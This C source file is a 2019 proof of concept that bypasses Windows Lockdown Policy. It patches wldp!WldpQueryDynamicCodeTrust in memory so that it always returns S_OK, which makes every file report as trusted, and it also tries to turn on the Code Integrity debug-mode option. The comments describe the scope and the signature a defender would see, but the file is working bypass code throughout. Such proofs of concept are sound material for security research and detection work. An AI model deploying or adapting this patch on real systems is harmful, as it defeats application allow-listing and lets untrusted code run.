Patching WLDP
/**
  BSD 3-Clause License

  Copyright (c) 2019 Odzhan. All rights reserved.

  Redistribution and use in source and binary forms, with or without
  modification, are permitted provided that the following conditions are met:

  * Redistributions of source code must retain the above copyright notice, this
    list of conditions and the following disclaimer.

  * Redistributions in binary form must reproduce the above copyright notice,
    this list of conditions and the following disclaimer in the documentation
    and/or other materials provided with the distribution.

  * Neither the name of the copyright holder nor the names of its
    contributors may be used to endorse or promote products derived from
    this software without specific prior written permission.

  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
  FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
  OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <windows.h>
#include <wldp.h>
#include <stdio.h>
#include <string.h>
// Prototypes for the two wldp.dll exports this program resolves at run time
// with GetProcAddress (see VerifyCodeTrust and main) instead of linking
// against them; parameter lists mirror the declarations in wldp.h.
typedef HRESULT (WINAPI *WldpIsDynamicCodePolicyEnabled_t)(
    PBOOL isEnabled);        // out: main prints "enabled"/"disabled" from this
typedef HRESULT (WINAPI *WldpQueryDynamicCodeTrust_t)(
    HANDLE fileHandle,       // VerifyCodeTrust passes 0 and supplies the image instead
    PVOID baseImage,         // mapped file contents to evaluate
    ULONG ImageSize);        // size of baseImage in bytes
// Replacement body for wldp!WldpQueryDynamicCodeTrust: reports every image as
// trusted by returning S_OK unconditionally. PatchWldp copies the *machine
// code* of this function over the real export, so the body must stay exactly
// this trivial -- any extra statement changes the bytes that get copied.
static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
    HANDLE fileHandle,
    PVOID baseImage,
    ULONG ImageSize)
{
    return S_OK;
}
// Empty marker placed directly after the stub; PatchWldp uses the distance
// between the two function addresses as the stub's length. That relies on the
// compiler/linker laying the functions out in source order and not resolving
// their symbols through jump thunks (as incremental linking does) -- confirm
// for the toolchain in use.
static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {}
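// Overwrites the in-process copy of wldp!WldpQueryDynamicCodeTrust with the
// always-S_OK stub above. Returns TRUE only when the bytes were written.
//
// Scope: this is a private, copy-on-write modification of the wldp.dll image
// in THIS process only; other processes load the pristine DLL, and any
// enforcement that does not go through this export in this process is, as far
// as this code shows, unaffected. From a defender's view the sequence below --
// VirtualProtect(PAGE_EXECUTE_READWRITE) on an image-backed page of wldp.dll
// followed by a write to it -- is the classic inline-hook signature.
static BOOL PatchWldp(VOID) {
    HMODULE   wldp;
    LPVOID    target;
    ULONG_PTR stubBegin, stubEnd;
    SIZE_T    len;
    DWORD     oldProtect, ignored;

    wldp = LoadLibrary("wldp");
    if (wldp == NULL) return FALSE;

    target = (LPVOID)GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    if (target == NULL) return FALSE;

    // Stub length = distance to the empty marker function that follows it.
    // If the toolchain reorders the two functions (or resolves their symbols
    // to jump thunks, as incremental linking does) the difference is garbage;
    // previously that wrapped into a DWORD and went straight to VirtualProtect.
    stubBegin = (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
    stubEnd   = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd;
    if (stubEnd <= stubBegin) return FALSE;
    len = (SIZE_T)(stubEnd - stubBegin);

    // make the export's page writable for the duration of the copy
    if (!VirtualProtect(target, len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        return FALSE;
    }

    memcpy(target, (const void *)stubBegin, len);

    // restore the original protection, then discard any stale decoded
    // instructions for the patched range
    VirtualProtect(target, len, oldProtect, &ignored);
    FlushInstructionCache(GetCurrentProcess(), target, len);
    return TRUE;
}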
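// Asks wldp.dll whether the file at `path` is trusted under the current
// dynamic code policy: the file is mapped read-only and the view is handed to
// WldpQueryDynamicCodeTrust. Returns TRUE only when that call yields S_OK;
// failing to resolve the export, or to open, size or map the file, returns
// FALSE. Once PatchWldp has run in this process the export is the always-S_OK
// stub, so every readable non-empty file is reported as trusted -- the answer
// is process-local and says nothing about what the system itself would decide.
BOOL VerifyCodeTrust(const char *path) {
    WldpQueryDynamicCodeTrust_t queryTrust = NULL;
    HMODULE       wldp;
    HANDLE        file = INVALID_HANDLE_VALUE;
    HANDLE        map  = NULL;
    LPVOID        view = NULL;
    LARGE_INTEGER size;
    HRESULT       hr   = E_FAIL;

    // a failed LoadLibrary falls through to the same "unable to resolve" path
    wldp = LoadLibrary("wldp");
    if (wldp != NULL) {
        queryTrust = (WldpQueryDynamicCodeTrust_t)
            GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    }
    if (queryTrust == NULL) {
        printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
        return FALSE;
    }

    file = CreateFile(path, GENERIC_READ, FILE_SHARE_READ, NULL,
                      OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE) goto cleanup;

    // WldpQueryDynamicCodeTrust takes a ULONG size: reject empty files and
    // anything that does not fit, rather than silently passing the low 32
    // bits of a larger size as the old GetFileSize(&low, &high) code did.
    if (!GetFileSizeEx(file, &size)) goto cleanup;
    if (size.QuadPart <= 0 || size.QuadPart > 0xFFFFFFFFLL) goto cleanup;

    map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, NULL);
    if (map == NULL) goto cleanup;

    view = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
    if (view == NULL) goto cleanup;

    // no file handle: the mapped image is what gets evaluated
    hr = queryTrust(NULL, view, (ULONG)size.QuadPart);

cleanup:
    if (view != NULL) UnmapViewOfFile(view);
    if (map  != NULL) CloseHandle(map);
    if (file != INVALID_HANDLE_VALUE) CloseHandle(file);
    return hr == S_OK;
}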
// Native API declarations used below (NTSTATUS, NT_SUCCESS,
// NtQuerySystemInformation, NtSetSystemInformation).
// NOTE(review): absolute, machine-specific include path -- the file only
// builds where this header sits at exactly this location.
#include "C:\ntlib\ntddk.h"
// SYSTEM_INFORMATION_CLASS value queried by ListCIOptions and EnableCIOption;
// the result is a SYSTEM_CODEINTEGRITY_INFORMATION whose CodeIntegrityOptions
// field is a bit mask built from the flags that follow.
#define SystemCodeIntegrityInformation 0x67
// CodeIntegrityOptions bits. Names are the only documentation this file
// carries for them; ListCIOptions prints whichever are set.
#define CODEINTEGRITY_OPTION_ENABLED 0x0001
#define CODEINTEGRITY_OPTION_TESTSIGN 0x0002
#define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x0004
#define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x0008
#define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x0010
#define CODEINTEGRITY_OPTION_TEST_BUILD 0x0020
#define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x0040
#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x0080
#define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x0100
#define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x0200
#define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 0x0400
#define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x0800
#define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000
#define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000
// One row of the options[] name table: a CodeIntegrityOptions bit and the
// identifier ListCIOptions prints when that bit is set.
typedef struct _ci_opt {
    ULONG ulOption;   // a single CODEINTEGRITY_OPTION_* bit
    PCHAR szOption;   // its printable name
} ci_opt;
// Name table walked by ListCIOptions; the {0, NULL} sentinel terminates it.
// Each entry's string is the flag's own identifier, produced by the
// stringizing macro so the value and its name cannot drift apart.
#define CI_OPT_ENTRY(flag) { flag, #flag }
ci_opt options[] = {
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_ENABLED),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_TESTSIGN),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_UMCI_ENABLED),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_TEST_BUILD),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_FLIGHT_BUILD),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_FLIGHTING_ENABLED),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED),
    CI_OPT_ENTRY(CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED),
    { 0, NULL }
};
#undef CI_OPT_ENTRY
// Buffer layout for NtQuerySystemInformation(SystemCodeIntegrityInformation).
// Callers in this file set Length to sizeof(struct) before the call; on
// return CodeIntegrityOptions holds the CODEINTEGRITY_OPTION_* bit mask.
typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
    ULONG Length;
    ULONG CodeIntegrityOptions;
} SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;
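// Prints the name of every bit set in the system's CodeIntegrityOptions mask
// as reported by NtQuerySystemInformation(SystemCodeIntegrityInformation).
// A failed query now prints the NTSTATUS instead of printing nothing, so an
// unsupported info class is distinguishable from "no options set", and bits
// not covered by the options[] table are reported as a raw mask.
VOID ListCIOptions(VOID) {
    SYSTEM_CODEINTEGRITY_INFORMATION info;
    ULONG    returned = 0;
    ULONG    unknown;
    NTSTATUS status;
    size_t   i;

    // Length must be filled in before the call
    info.Length = sizeof(info);
    info.CodeIntegrityOptions = 0;

    status = NtQuerySystemInformation(SystemCodeIntegrityInformation,
                                      &info, sizeof(info), &returned);
    if (!NT_SUCCESS(status)) {
        printf("\nNtQuerySystemInformation(SystemCodeIntegrityInformation) failed: %08lx\n",
               (unsigned long)status);
        return;
    }

    printf("\nCode Integrity Options.\n\n");
    unknown = info.CodeIntegrityOptions;
    for (i = 0; options[i].ulOption != 0; i++) {
        if (info.CodeIntegrityOptions & options[i].ulOption) {
            printf("%s\n", options[i].szOption);
            unknown &= ~options[i].ulOption;
        }
    }
    // anything left over is a bit the table above does not know about
    if (unknown != 0) {
        printf("(unrecognised option bits: %08lx)\n", (unsigned long)unknown);
    }
}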
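// Attempts to OR `Option` into the system's CodeIntegrityOptions through
// NtSetSystemInformation and prints the resulting NTSTATUS. The original
// author observed that the set call returns STATUS_INVALID_INFO_CLASS, so
// treat this as an experiment, not a working primitive. Returns TRUE only if
// both the query and the set succeeded.
//
// Fixes versus the earlier version: the `Option` argument was ignored and
// CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED was always used (main passes that
// same value, so its behaviour is unchanged); NtSetSystemInformation takes
// three parameters (class, buffer, length) and was being called with a
// fourth pointer it does not declare.
BOOL EnableCIOption(ULONG Option) {
    SYSTEM_CODEINTEGRITY_INFORMATION info;
    ULONG    returned = 0;
    NTSTATUS status;

    info.Length = sizeof(info);
    info.CodeIntegrityOptions = 0;

    // read the current mask first so only the requested bit changes
    status = NtQuerySystemInformation(SystemCodeIntegrityInformation,
                                      &info, sizeof(info), &returned);
    if (NT_SUCCESS(status)) {
        info.CodeIntegrityOptions |= Option;
        status = NtSetSystemInformation(SystemCodeIntegrityInformation,
                                        &info, sizeof(info));
        printf("status is %08lx\n", (unsigned long)status);
    }
    return NT_SUCCESS(status);
}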
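// Entry point. Order of operations is kept from the original:
//   1. try to flip a CI option (expected to fail, see EnableCIOption),
//   2. list the current Code Integrity options,
//   3. report whether a WLDP dynamic code policy is enabled,
//   4. patch wldp!WldpQueryDynamicCodeTrust in this process,
//   5. run VerifyCodeTrust on every file given on the command line.
// Because step 4 replaces the export with an always-S_OK stub, step 5 prints
// "OK" for every readable non-empty file; that is the demonstration. Nothing
// here needs elevation and nothing outlives the process.
int main(int argc, char *argv[]) {
    WldpIsDynamicCodePolicyEnabled_t isPolicyEnabled = NULL;
    HMODULE wldp;
    BOOL    enabled = FALSE;
    HRESULT hr;
    int     i;

    EnableCIOption(CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED);
    ListCIOptions();

    // Resolve WldpIsDynamicCodePolicyEnabled by its own name. The earlier
    // version looked up "WldpQueryDynamicCodeTrust" here and called it through
    // the one-argument prototype, so the "policy is ..." line was meaningless.
    wldp = LoadLibrary("wldp");
    if (wldp != NULL) {
        isPolicyEnabled = (WldpIsDynamicCodePolicyEnabled_t)
            GetProcAddress(wldp, "WldpIsDynamicCodePolicyEnabled");
    }
    if (isPolicyEnabled == NULL) {
        // bail out instead of calling a NULL function pointer
        printf("unable to load Wldp.\n");
        return 0;
    }
    hr = isPolicyEnabled(&enabled);
    if (hr != S_OK) {
        printf("WldpIsDynamicCodePolicyEnabled failed: %08lx\n", (unsigned long)hr);
    } else {
        printf("Wldp Code Policy is %s.\n", enabled ? "enabled" : "disabled");
    }

    if (!PatchWldp()) {
        printf("unable to patch Wldp.\n");
        return 0;
    }

    for (i = 1; i < argc; i++) {
        DWORD attr = GetFileAttributes(argv[i]);
        // INVALID_FILE_ATTRIBUTES has the directory bit set, so a missing or
        // inaccessible path used to be skipped silently; report it instead
        if (attr == INVALID_FILE_ATTRIBUTES) {
            printf("%-8s : %s\n", "NOTFOUND", argv[i]);
            continue;
        }
        if (attr & FILE_ATTRIBUTE_DIRECTORY) continue;   // skip directories
        printf("%-8s : %s\n",
               VerifyCodeTrust(argv[i]) ? "OK" : "FAILED",
               argv[i]);
    }
    return 0;
}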